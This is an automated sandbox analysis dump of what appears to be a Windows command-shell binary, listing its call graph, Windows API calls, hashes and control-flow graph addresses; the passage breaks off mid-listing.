7ff7937496ce 19088->19090 19091 7ff793746a48 184 API calls 19088->19091 19090->18988 19091->19088 19093 7ff79375596c 19092->19093 19094 7ff793755a12 19092->19094 19093->19094 19095 7ff79375598d VirtualQuery 19093->19095 19094->18988 19095->19094 19097 7ff7937559ad 19095->19097 19096 7ff7937559b7 VirtualQuery 19096->19094 19096->19097 19097->19094 19097->19096 19099 7ff79376e954 19098->19099 19100 7ff79376e990 19098->19100 19101 7ff79376ee88 390 API calls 19099->19101 19102 7ff79376e9b4 197 API calls 19100->19102 19104 7ff79376e964 19101->19104 19103 7ff79376e995 longjmp 19102->19103 19104->19100 19105 7ff7937496b4 186 API calls 19104->19105 19105->19104 19107 7ff7937676a3 19106->19107 19108 7ff7937676b7 19107->19108 19110 7ff7937496b4 186 API calls 19107->19110 19109 7ff79376e9b4 197 API calls 19108->19109 19111 7ff7937676bc longjmp 19109->19111 19110->19107 19114 7ff7937504a4 19112->19114 19113 7ff7937526e0 19 API calls 19113->19114 19114->19113 19115 7ff7937504b9 _get_osfhandle SetFilePointer 19114->19115 19116 7ff79375d845 19114->19116 19118 7ff79375d839 19114->19118 19121 7ff793743278 166 API calls 19114->19121 19115->19083 19117 7ff79376f1d8 166 API calls 19116->19117 19120 7ff79375d837 19117->19120 19119 7ff793743278 166 API calls 19118->19119 19119->19120 19122 7ff79375d819 _getch 19121->19122 19122->19114 19123 7ff79375d832 19122->19123 19222 7ff79376bde4 EnterCriticalSection LeaveCriticalSection 19123->19222 19126 7ff79374df93 19125->19126 19127 7ff79374dfe2 19125->19127 19126->19127 19128 7ff79374df9f GetProcessHeap RtlFreeHeap 19126->19128 19129 7ff79374e100 VirtualFree 19127->19129 19130 7ff79374e00b _setjmp 19127->19130 19128->19126 19128->19127 19129->19127 19131 7ff79374e04a 19130->19131 19132 7ff79374e0c3 19130->19132 19133 7ff79374e600 473 API calls 19131->19133 19132->19052 19134 7ff79374e073 19133->19134 19135 7ff79374e0e0 longjmp 19134->19135 19136 7ff79374e081 19134->19136 19144 7ff79374e0b0 19135->19144 19137 7ff79374d250 475 API calls 19136->19137 19138 7ff79374e086 19137->19138 19141 7ff79374e600 473 API calls 19138->19141 19138->19144 19142 7ff79374e0a7 19141->19142 19143 7ff79376d610 167 API calls 19142->19143 19142->19144 19143->19144 19144->19132 19223 7ff79376d3fc 19144->19223 19146 7ff79376eefd 19145->19146 19147 7ff79376eed1 19145->19147 19285 7ff79375885c FormatMessageW 19146->19285 19271 7ff793747420 19147->19271 19151 7ff7937501b8 6 API calls 19152 7ff79376eee5 19151->19152 19154 7ff79376eeeb 19152->19154 19155 7ff79376eef8 19152->19155 19153 7ff79376ef04 19156 7ff79376ef41 LocalFree GetStdHandle GetConsoleMode 19153->19156 19159 7ff79376ef2f _wcsupr 19153->19159 19157 7ff79374d208 _close 19154->19157 19158 7ff79374d208 _close 19155->19158 19161 7ff79376efe8 GetStdHandle GetConsoleMode 19156->19161 19162 7ff79376efcf SetConsoleMode 19156->19162 19178 7ff79376eef0 19157->19178 19158->19146 19159->19156 19163 7ff79376f015 SetConsoleMode 19161->19163 19171 7ff79376f03c 19161->19171 19162->19161 19163->19171 19164 7ff793758f80 7 API calls 19165 7ff79375c879 19164->19165 19165->19048 19165->19049 19166 7ff793743240 166 API calls 19166->19171 19167 7ff79376f07e GetStdHandle FlushConsoleInputBuffer 19167->19171 19168 7ff79376f0a0 GetStdHandle 19169 7ff793768450 367 API calls 19168->19169 19169->19171 19170 7ff79376f12d wcschr 19170->19171 19171->19166 19171->19167 19171->19168 19171->19170 19172 7ff79376f161 19171->19172 19175 7ff793753448 166 API calls 19171->19175 19177 7ff79376f0d7 towupper 19171->19177 19179 7ff7937501b8 6 API calls 19171->19179 19180 7ff793753448 166 API calls 19171->19180 19173 7ff79376f17a 19172->19173 19174 7ff79376f166 SetConsoleMode 19172->19174 19176 7ff79376f17f SetConsoleMode 19173->19176 19173->19178 19174->19173 19175->19170 19176->19178 19177->19171 19178->19164 19179->19171 19180->19171 19204 7ff7937677bc 19181->19204 19182 7ff793767aca 19185 7ff7937534a0 166 API calls 19182->19185 19183 7ff7937679c0 19189 7ff7937534a0 166 API calls 19183->19189 19187 7ff793767adb 19185->19187 19186 7ff793767ab5 19190 7ff793753448 166 API calls 19186->19190 19192 7ff793767af0 19187->19192 19195 7ff793753448 166 API calls 19187->19195 19188 7ff793767984 19188->19183 19193 7ff793767989 19188->19193 19194 7ff7937679d6 19189->19194 19205 7ff7937679ef 19190->19205 19191 7ff793767a00 19197 7ff793767a0b 19191->19197 19191->19205 19208 7ff793767a33 19191->19208 19196 7ff79376778c 166 API calls 19192->19196 19193->19205 19290 7ff7937676e0 19193->19290 19199 7ff793753448 166 API calls 19194->19199 19211 7ff7937679e7 19194->19211 19195->19192 19198 7ff793767afb 19196->19198 19201 7ff7937534a0 166 API calls 19197->19201 19197->19205 19198->19193 19202 7ff793753448 166 API calls 19198->19202 19199->19211 19206 7ff793767a23 19201->19206 19202->19193 19203 7ff793753448 166 API calls 19203->19205 19204->19182 19204->19183 19204->19186 19204->19188 19204->19191 19204->19193 19204->19205 19207 7ff79376778c 166 API calls 19204->19207 19210 7ff793753448 166 API calls 19204->19210 19205->19083 19209 7ff79376778c 166 API calls 19206->19209 19207->19204 19208->19203 19209->19211 19210->19204 19286 7ff793767730 19211->19286 19213 7ff79376c775 19212->19213 19219 7ff79376c7ab 19212->19219 19214 7ff79374cd90 166 API calls 19213->19214 19215 7ff79376c781 19214->19215 19216 7ff79376c8d4 19215->19216 19217 7ff79374b0d8 194 API calls 19215->19217 19216->19083 19217->19216 19218 7ff79374b6b0 170 API calls 19218->19219 19219->19215 19219->19216 19219->19218 19220 7ff79374b038 _dup2 19219->19220 19221 7ff79374d208 _close 19219->19221 19220->19219 19221->19219 19225 7ff79376d419 19223->19225 19224 7ff79376d576 19226 7ff79376d555 19224->19226 19227 7ff79376d592 19224->19227 19225->19224 19225->19226 19225->19227 19229 7ff79376d5c4 19225->19229 19232 7ff79376d541 19225->19232 19235 7ff793753448 166 API calls 19225->19235 19239 7ff79375cadf 19225->19239 19240 7ff79376d3fc 166 API calls 19225->19240 19248 7ff79376d31c 19226->19248 19228 7ff793753448 166 API calls 19227->19228 19231 7ff79376d5a5 19228->19231 19233 7ff793753448 166 API calls 19229->19233 19234 7ff79376d5ba 19231->19234 19237 7ff793753448 166 API calls 19231->19237 19232->19227 19236 7ff79376d546 19232->19236 19233->19239 19241 7ff79376d36c 19234->19241 19235->19225 19236->19226 19236->19229 19237->19234 19240->19225 19242 7ff79376d3d8 19241->19242 19243 7ff79376d381 19241->19243 19244 7ff7937534a0 166 API calls 19243->19244 19246 7ff79376d390 19244->19246 19245 7ff793753448 166 API calls 19245->19246 19246->19242 19246->19245 19247 7ff7937534a0 166 API calls 19246->19247 19247->19246 19249 7ff793753448 166 API calls 19248->19249 19250 7ff79376d33b 19249->19250 19251 7ff79376d36c 166 API calls 19250->19251 19252 7ff79376d343 19251->19252 19253 7ff79376d3fc 166 API calls 19252->19253 19255 7ff79376d34e 19253->19255 19254 7ff79376d576 19256 7ff79376d592 19254->19256 19264 7ff79376d555 19254->19264 19255->19254 19255->19256 19258 7ff79376d5c4 19255->19258 19261 7ff79376d541 19255->19261 19255->19264 19267 7ff79376d3fc 166 API calls 19255->19267 19269 7ff79376d5c2 19255->19269 19270 7ff793753448 166 API calls 19255->19270 19257 7ff793753448 166 API calls 19256->19257 19260 7ff79376d5a5 19257->19260 19262 7ff793753448 166 API calls 19258->19262 19259 7ff79376d31c 166 API calls 19259->19269 19263 7ff79376d5ba 19260->19263 19265 7ff793753448 166 API calls 19260->19265 19261->19256 19268 7ff79376d546 19261->19268 19262->19269 19266 7ff79376d36c 166 API calls 19263->19266 19264->19259 19265->19263 19266->19269 19267->19255 19268->19258 19268->19264 19269->19239 19270->19255 19272 7ff793747468 19271->19272 19273 7ff79374745f 19271->19273 19272->19146 19272->19151 19273->19272 19274 7ff793747497 _wcsicmp 19273->19274 19275 7ff7937648c8 _wcsicmp 19273->19275 19276 7ff793751ea0 8 API calls 19274->19276 19277 7ff7937648ed CreateFileW 19275->19277 19278 7ff7937474bd 19276->19278 19279 7ff7937474c9 CreateFileW 19277->19279 19280 7ff793764929 19277->19280 19278->19277 19278->19279 19281 7ff793747501 _open_osfhandle 19279->19281 19282 7ff793764943 GetLastError 19279->19282 19280->19281 19281->19272 19283 7ff793747520 CloseHandle 19281->19283 19282->19272 19283->19272 19285->19153 19289 7ff79376773c 19286->19289 19287 7ff79376777d 19287->19205 19288 7ff793753448 166 API calls 19288->19289 19289->19287 19289->19288 19291 7ff79376778c 166 API calls 19290->19291 19292 7ff7937676fb 19291->19292 19293 7ff79376771c 19292->19293 19294 7ff793753448 166 API calls 19292->19294 19293->19205 19295 7ff793767711 19294->19295 19296 7ff79376778c 166 API calls 19295->19296 19296->19293 19298 7ff79374c4c9 19297->19298 19299 7ff79374c486 19297->19299 19303 7ff79374ff70 2 API calls 19298->19303 19304 7ff79374c161 19298->19304 19300 7ff79374c48e wcschr 19299->19300 19299->19304 19301 7ff79374c4ef 19300->19301 19300->19304 19302 7ff79374cd90 166 API calls 19301->19302 19310 7ff79374c4f9 19302->19310 19303->19304 19304->18735 19304->18758 19305 7ff79374c5bd 19307 7ff79374b6b0 170 API calls 19305->19307 19309 7ff79374c541 19305->19309 19306 7ff79374ff70 2 API calls 19306->19304 19307->19309 19308 7ff79374d840 178 API calls 19308->19310 19309->19304 19309->19306 19310->19304 19310->19305 19310->19308 19310->19309 19312 7ff79374b018 19311->19312 19312->18799 19313->18799 19315 7ff793753bcf 19314->19315 19317 7ff793753bfe 19314->19317 19316 7ff793753bdc wcschr 19315->19316 19315->19317 19316->19315 19316->19317 19317->18862 19319 7ff793752f97 19318->19319 19320 7ff793752f2a 19318->19320 19319->19320 19321 7ff793752f9c wcschr 19319->19321 19322 7ff79375823c 10 API calls 19320->19322 19323 7ff793752fb6 wcschr 19321->19323 19324 7ff793752f5a 19321->19324 19325 7ff793752f56 19322->19325 19323->19320 19323->19324 19327 7ff793758f80 7 API calls 19324->19327 19331 7ff79375e4ec 19324->19331 19325->19324 19326 7ff793753a0c 2 API calls 19325->19326 19328 7ff793752fe0 19326->19328 19329 7ff793752f83 19327->19329 19328->19324 19330 7ff793752fe9 wcsrchr 19328->19330 19329->18862 19330->19324 19333 7ff7937472de 19332->19333 19334 7ff793764621 19332->19334 19335 7ff7937472eb 19333->19335 19343 7ff793764467 19333->19343 19344 7ff793764530 19333->19344 19336 7ff7937647e0 19334->19336 19337 7ff79376447b longjmp 19334->19337 19340 7ff793764639 19334->19340 19368 7ff79376475e 19334->19368 19393 7ff793747348 19335->19393 19339 7ff793747348 168 API calls 19336->19339 19341 7ff793764492 19337->19341 19391 7ff793764524 19339->19391 19345 7ff793764695 19340->19345 19360 7ff79376463e 19340->19360 19346 7ff793747348 168 API calls 19341->19346 19343->19335 19343->19341 19349 7ff793764475 19343->19349 19347 7ff793747348 168 API calls 19344->19347 19354 7ff7937473d4 168 API calls 19345->19354 19361 7ff7937644a8 19346->19361 19377 7ff793764549 19347->19377 19348 7ff793747315 19408 7ff7937473d4 19348->19408 19349->19337 19349->19345 19350 7ff793747348 168 API calls 19350->19336 19351 7ff793747348 168 API calls 19351->19348 19352 7ff7937472b0 168 API calls 19356 7ff79376480e 19352->19356 19370 7ff79376469a 19354->19370 19355 7ff7937645b2 19358 7ff793747348 168 API calls 19355->19358 19356->18890 19357 7ff793747323 19357->18890 19365 7ff7937645c7 19358->19365 19359 7ff793764654 19367 7ff793747348 168 API calls 19359->19367 19360->19337 19360->19359 19366 7ff7937644e2 19361->19366 19373 7ff793747348 168 API calls 19361->19373 19362 7ff79376455e 19362->19355 19371 7ff793747348 168 API calls 19362->19371 19363 7ff7937646e1 19364 7ff7937472b0 168 API calls 19363->19364 19369 7ff793764738 19364->19369 19372 7ff793747348 168 API calls 19365->19372 19374 7ff7937472b0 168 API calls 19366->19374 19367->19357 19368->19350 19375 7ff793747348 168 API calls 19369->19375 19370->19363 19382 7ff7937646c7 19370->19382 19383 7ff7937646ea 19370->19383 19371->19355 19376 7ff7937645db 19372->19376 19373->19366 19378 7ff7937644f1 19374->19378 19375->19391 19380 7ff793747348 168 API calls 19376->19380 19377->19355 19377->19362 19379 7ff793747348 168 API calls 19377->19379 19381 7ff7937472b0 168 API calls 19378->19381 19379->19362 19384 7ff7937645ec 19380->19384 19385 7ff793764503 19381->19385 19382->19363 19389 7ff793747348 168 API calls 19382->19389 19386 7ff793747348 168 API calls 19383->19386 19387 7ff793747348 168 API calls 19384->19387 19385->19357 19388 7ff793747348 168 API calls 19385->19388 19386->19363 19390 7ff793764600 19387->19390 19388->19391 19389->19363 19392 7ff793747348 168 API calls 19390->19392 19391->19352 19391->19357 19392->19391 19399 7ff79374735d 19393->19399 19394 7ff793743278 166 API calls 19395 7ff793764820 longjmp 19394->19395 19396 7ff793764838 19395->19396 19397 7ff793743278 166 API calls 19396->19397 19398 7ff793764844 longjmp 19397->19398 19400 7ff79376485a 19398->19400 19399->19394 19399->19396 19407 7ff7937473ab 19399->19407 19401 7ff793747348 166 API calls 19400->19401 19402 7ff79376487b 19401->19402 19403 7ff793747348 166 API calls 19402->19403 19404 7ff7937648ad 19403->19404 19405 7ff793747348 166 API calls 19404->19405 19406 7ff7937472ff 19405->19406 19406->19348 19406->19351 19409 7ff79376485a 19408->19409 19410 7ff793747401 19408->19410 19411 7ff793747348 168 API calls 19409->19411 19410->19357 19412 7ff79376487b 19411->19412 19413 7ff793747348 168 API calls 19412->19413 19414 7ff7937648ad 19413->19414 19415 7ff793747348 168 API calls 19414->19415 19416 7ff7937648be 19415->19416 19416->19357 16786 7ff793758d80 16787 7ff793758da4 16786->16787 16788 7ff793758db6 16787->16788 16789 7ff793758dbf Sleep 16787->16789 16790 7ff793758ddb _amsg_exit 16788->16790 16793 7ff793758de7 16788->16793 16789->16787 16790->16793 16791 7ff793758e56 _initterm 16795 7ff793758e73 _IsNonwritableInCurrentImage 16791->16795 16792 7ff793758e3c 16793->16791 16793->16792 16793->16795 16800 7ff7937537d8 GetCurrentThreadId OpenThread 16795->16800 16833 7ff7937504f4 16800->16833 16802 7ff793753839 HeapSetInformation RegOpenKeyExW 16803 7ff79375388d 16802->16803 16804 7ff79375e9f8 RegQueryValueExW RegCloseKey 16802->16804 16805 7ff793755920 VirtualQuery VirtualQuery 16803->16805 16807 7ff79375ea41 GetThreadLocale 16804->16807 16806 7ff7937538ab GetConsoleOutputCP GetCPInfo 16805->16806 16806->16807 16808 7ff7937538f1 memset 16806->16808 16810 7ff793753919 16807->16810 16808->16810 16809 7ff793754d5c 391 API calls 16809->16810 16810->16804 16810->16809 16811 7ff79375eb27 _setjmp 16810->16811 16812 7ff793753948 _setjmp 16810->16812 16813 7ff793768530 370 API calls 16810->16813 16814 7ff793743240 166 API calls 16810->16814 16815 7ff7937501b8 6 API calls 16810->16815 16816 7ff793754c1c 166 API calls 16810->16816 16817 7ff79374df60 481 API calls 16810->16817 16818 7ff79375eb71 _setmode 16810->16818 16819 7ff7937586f0 182 API calls 16810->16819 16820 7ff793750580 12 API calls 16810->16820 16823 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16823 16824 7ff79374be00 647 API calls 16810->16824 16825 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16825 16811->16810 16812->16810 16813->16810 16814->16810 16815->16810 16816->16810 16817->16810 16818->16810 16819->16810 16821 7ff79375398b GetConsoleOutputCP GetCPInfo 16820->16821 16822 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16821->16822 16822->16810 16823->16810 16824->16810 16826 7ff79375ebbe GetConsoleOutputCP GetCPInfo 16825->16826 16827 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16826->16827 16828 7ff79375ebe6 16827->16828 16829 7ff79374be00 647 API calls 16828->16829 16830 7ff793750580 12 API calls 16828->16830 16829->16828 16831 7ff79375ebfc GetConsoleOutputCP GetCPInfo 16830->16831 16832 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16831->16832 16832->16810 16834 7ff793750504 16833->16834 16835 7ff79375051e GetModuleHandleW 16834->16835 16836 7ff79375054d GetProcAddress 16834->16836 16837 7ff79375056c SetThreadLocale 16834->16837 16835->16834 16836->16834

                                                                                      Executed Functions

                                                                                      Function 00007FF793750A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                      • API String ID: 3305344409-4288247545
                                                                                      • Opcode ID: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction ID: 4407d8c19104c09594780358b436445b67f96e7267e9bee31977e3d803b385cd
                                                                                      • Opcode Fuzzy Hash: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction Fuzzy Hash: 5C42C521A0868285FFF8BB3198D42B9A7A8EF8D795F844136D91E677D4DF3CE5448320
                                                                                      Function 00007FF79374AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 7ff79374aa54-7ff79374aa98 call 7ff79374cd90 219 7ff79374aa9e 216->219 220 7ff79375bf5a-7ff79375bf70 call 7ff793754c1c call 7ff79374ff70 216->220 221 7ff79374aaa5-7ff79374aaa8 219->221 223 7ff79374acde-7ff79374ad00 221->223 224 7ff79374aaae-7ff79374aac8 wcschr 221->224 230 7ff79374ad06 223->230 224->223 227 7ff79374aace-7ff79374aae9 towlower 224->227 227->223 229 7ff79374aaef-7ff79374aaf3 227->229 233 7ff79375beb7-7ff79375bec4 call 7ff79376eaf0 229->233 234 7ff79374aaf9-7ff79374aafd 229->234 231 7ff79374ad0d-7ff79374ad1f 230->231 237 7ff79374ad22-7ff79374ad2a call 7ff7937513e0 231->237 246 7ff79375bf43-7ff79375bf59 call 7ff793754c1c 233->246 247 7ff79375bec6-7ff79375bed8 call 7ff793743240 233->247 235 7ff79374ab03-7ff79374ab07 234->235 236 7ff79375bbcf 234->236 239 7ff79374ab7d-7ff79374ab81 235->239 240 7ff79374ab09-7ff79374ab0d 235->240 249 7ff79375bbde 236->249 237->221 244 7ff79375be63 239->244 248 7ff79374ab87-7ff79374ab95 239->248 243 7ff79374ab13-7ff79374ab17 240->243 240->244 243->239 250 7ff79374ab19-7ff79374ab1d 243->250 255 7ff79375be72-7ff79375be88 call 7ff793743278 call 7ff793754c1c 244->255 246->220 247->246 263 7ff79375beda-7ff79375bee9 call 7ff793743240 247->263 253 7ff79374ab98-7ff79374aba0 248->253 259 7ff79375bbea-7ff79375bbec 249->259 250->249 254 7ff79374ab23-7ff79374ab27 250->254 253->253 258 7ff79374aba2-7ff79374abb3 call 7ff79374cd90 253->258 254->259 261 7ff79374ab2d-7ff79374ab31 254->261 283 7ff79375be89-7ff79375be8c 255->283 258->220 269 7ff79374abb9-7ff79374abde call 7ff7937513e0 call 7ff7937533a8 258->269 265 7ff79375bbf8-7ff79375bc01 259->265 261->230 266 7ff79374ab37-7ff79374ab3b 261->266 277 7ff79375beeb-7ff79375bef1 263->277 278 7ff79375bef3-7ff79375bef9 263->278 265->231 266->265 270 7ff79374ab41-7ff79374ab45 266->270 305 7ff79374abe4-7ff79374abe7 269->305 306 7ff79374ac75 269->306 274 7ff79374ab4b-7ff79374ab4f 270->274 275 7ff79375bc06-7ff79375bc2a call 7ff7937513e0 270->275 281 7ff79374ab55-7ff79374ab78 call 7ff7937513e0 274->281 282 7ff79374ad2f-7ff79374ad33 274->282 294 7ff79375bc2c-7ff79375bc4c _wcsnicmp 275->294 295 7ff79375bc5a-7ff79375bc61 275->295 277->246 277->278 278->246 284 7ff79375befb-7ff79375bf0d call 7ff793743240 278->284 281->221 288 7ff79374ad39-7ff79374ad3d 282->288 289 7ff79375bc66-7ff79375bc8a call 7ff7937513e0 282->289 291 7ff79374acbe 283->291 292 7ff79375be92-7ff79375beaa call 7ff793743278 call 7ff793754c1c 283->292 284->246 303 7ff79375bf0f-7ff79375bf21 call 7ff793743240 284->303 297 7ff79375bcde-7ff79375bd02 call 7ff7937513e0 288->297 298 7ff79374ad43-7ff79374ad49 288->298 324 7ff79375bc8c-7ff79375bcaa _wcsnicmp 289->324 325 7ff79375bcc4-7ff79375bcdc 289->325 301 7ff79374acc0-7ff79374acc7 291->301 337 7ff79375beab-7ff79375beb6 call 7ff793754c1c 292->337 294->295 304 7ff79375bc4e-7ff79375bc55 294->304 309 7ff79375bd31-7ff79375bd4f _wcsnicmp 295->309 328 7ff79375bd2a 297->328 329 7ff79375bd04-7ff79375bd24 _wcsnicmp 297->329 307 7ff79375bd5e-7ff79375bd65 298->307 308 7ff79374ad4f-7ff79374ad68 298->308 301->301 311 7ff79374acc9-7ff79374acda 301->311 303->246 339 7ff79375bf23-7ff79375bf35 call 7ff793743240 303->339 319 7ff79375bbb3-7ff79375bbb7 304->319 305->291 321 7ff79374abed-7ff79374ac0b call 7ff79374cd90 * 2 305->321 316 7ff79374ac77-7ff79374ac7f 306->316 307->308 320 7ff79375bd6b-7ff79375bd73 307->320 322 7ff79374ad6d-7ff79374ad70 308->322 323 7ff79374ad6a 308->323 317 7ff79375bd55 309->317 318 7ff79375bbc2-7ff79375bbca 309->318 311->223 316->291 335 7ff79374ac81-7ff79374ac85 316->335 317->307 318->221 330 7ff79375bbba-7ff79375bbbd call 7ff7937513e0 319->330 331 7ff79375be4a-7ff79375be5e 320->331 332 7ff79375bd79-7ff79375bd8b iswxdigit 320->332 321->337 356 7ff79374ac11-7ff79374ac14 321->356 322->237 323->322 324->325 336 7ff79375bcac-7ff79375bcbf 324->336 325->309 328->309 329->328 338 7ff79375bbac 329->338 330->318 331->330 332->331 342 7ff79375bd91-7ff79375bda3 iswxdigit 332->342 340 7ff79374ac88-7ff79374ac8f 335->340 336->319 337->233 338->319 339->246 357 7ff79375bf37-7ff79375bf3e call 7ff793743240 339->357 340->340 348 7ff79374ac91-7ff79374ac94 340->348 342->331 345 7ff79375bda9-7ff79375bdbb iswxdigit 342->345 345->331 352 7ff79375bdc1-7ff79375bdd7 iswdigit 345->352 348->291 351 7ff79374ac96-7ff79374acaa wcsrchr 348->351 351->291 358 7ff79374acac-7ff79374acb9 call 7ff793751300 351->358 354 7ff79375bdd9-7ff79375bddd 352->354 355 7ff79375bddf-7ff79375bdeb towlower 352->355 361 7ff79375bdee-7ff79375be0f iswdigit 354->361 355->361 356->337 362 7ff79374ac1a-7ff79374ac33 memset 356->362 357->246 358->291 363 7ff79375be17-7ff79375be23 towlower 361->363 364 7ff79375be11-7ff79375be15 361->364 362->306 365 7ff79374ac35-7ff79374ac4b wcschr 362->365 366 7ff79375be26-7ff79375be45 call 7ff7937513e0 363->366 364->366 365->306 367 7ff79374ac4d-7ff79374ac54 365->367 366->331 368 7ff79374ac5a-7ff79374ac6f wcschr 367->368 369 7ff79374ad72-7ff79374ad91 wcschr 367->369 368->306 368->369 371 7ff79374ad97-7ff79374adac wcschr 369->371 372 7ff79374af03-7ff79374af07 369->372 371->372 373 7ff79374adb2-7ff79374adc7 wcschr 371->373 372->306 373->372 374 7ff79374adcd-7ff79374ade2 wcschr 373->374 374->372 375 7ff79374ade8-7ff79374adfd wcschr 374->375 375->372 376 7ff79374ae03-7ff79374ae18 wcschr 375->376 376->372 377 7ff79374ae1e-7ff79374ae21 376->377 378 7ff79374ae24-7ff79374ae27 377->378 378->372 379 7ff79374ae2d-7ff79374ae40 iswspace 378->379 380 7ff79374ae4b-7ff79374ae5e 379->380 381 7ff79374ae42-7ff79374ae49 379->381 382 7ff79374ae66-7ff79374ae6d 380->382 381->378 382->382 383 7ff79374ae6f-7ff79374ae77 382->383 383->255 384 7ff79374ae7d-7ff79374ae97 call 7ff7937513e0 383->384 387 7ff79374ae9a-7ff79374aea4 384->387 388 7ff79374aebc-7ff79374aef8 call 7ff793750a6c call 7ff79374ff70 * 2 387->388 389 7ff79374aea6-7ff79374aead 387->389 388->316 397 7ff79374aefe 388->397 389->388 390 7ff79374aeaf-7ff79374aeba 389->390 390->387 390->388 397->283
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                      • API String ID: 972821348-467788257
                                                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction ID: 5baea29ec09c63552ddf53e1c55b9fdae56214dad418049467c2a7cb0a0fd6f3
                                                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction Fuzzy Hash: A3229321A0864286FBF8BF3594D4279E6DAEF5DB81FC88136C90E67394DE3CB5408671
                                                                                      Function 00007FF7937551EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 398 7ff7937551ec-7ff793755248 call 7ff793755508 GetLocaleInfoW 401 7ff79375524e-7ff793755272 GetLocaleInfoW 398->401 402 7ff79375ef32-7ff79375ef3c 398->402 404 7ff793755274-7ff79375527a 401->404 405 7ff793755295-7ff7937552b9 GetLocaleInfoW 401->405 403 7ff79375ef3f-7ff79375ef49 402->403 408 7ff79375ef4b-7ff79375ef52 403->408 409 7ff79375ef61-7ff79375ef6c 403->409 410 7ff7937554f7-7ff7937554f9 404->410 411 7ff793755280-7ff793755286 404->411 406 7ff7937552bb-7ff7937552c3 405->406 407 7ff7937552de-7ff793755305 GetLocaleInfoW 405->407 412 7ff7937552c9-7ff7937552d7 406->412 413 7ff79375ef75-7ff79375ef78 406->413 414 7ff793755307-7ff79375531b 407->414 415 7ff793755321-7ff793755343 GetLocaleInfoW 407->415 408->409 416 7ff79375ef54-7ff79375ef5f 408->416 409->413 410->402 411->410 417 7ff79375528c-7ff79375528f 411->417 412->407 420 7ff79375ef7a-7ff79375ef7d 413->420 421 7ff79375ef99-7ff79375efa3 413->421 414->415 418 7ff793755349-7ff79375536e GetLocaleInfoW 415->418 419 7ff79375efaf-7ff79375efb9 415->419 416->403 416->409 417->405 423 7ff793755374-7ff793755396 GetLocaleInfoW 418->423 424 7ff79375eff2-7ff79375effc 418->424 422 7ff79375efbc-7ff79375efc6 419->422 420->407 425 7ff79375ef83-7ff79375ef8d 420->425 421->419 426 7ff79375efde-7ff79375efe9 422->426 427 7ff79375efc8-7ff79375efcf 422->427 429 7ff79375539c-7ff7937553be GetLocaleInfoW 423->429 430 7ff79375f035-7ff79375f03f 423->430 428 7ff79375efff-7ff79375f009 424->428 425->421 426->424 427->426 431 7ff79375efd1-7ff79375efdc 427->431 432 7ff79375f00b-7ff79375f012 428->432 433 7ff79375f021-7ff79375f02c 428->433 434 7ff79375f078-7ff79375f082 429->434 435 7ff7937553c4-7ff7937553e6 GetLocaleInfoW 429->435 436 7ff79375f042-7ff79375f04c 430->436 431->422 431->426 432->433 438 7ff79375f014-7ff79375f01f 432->438 433->430 437 7ff79375f085-7ff79375f08f 434->437 439 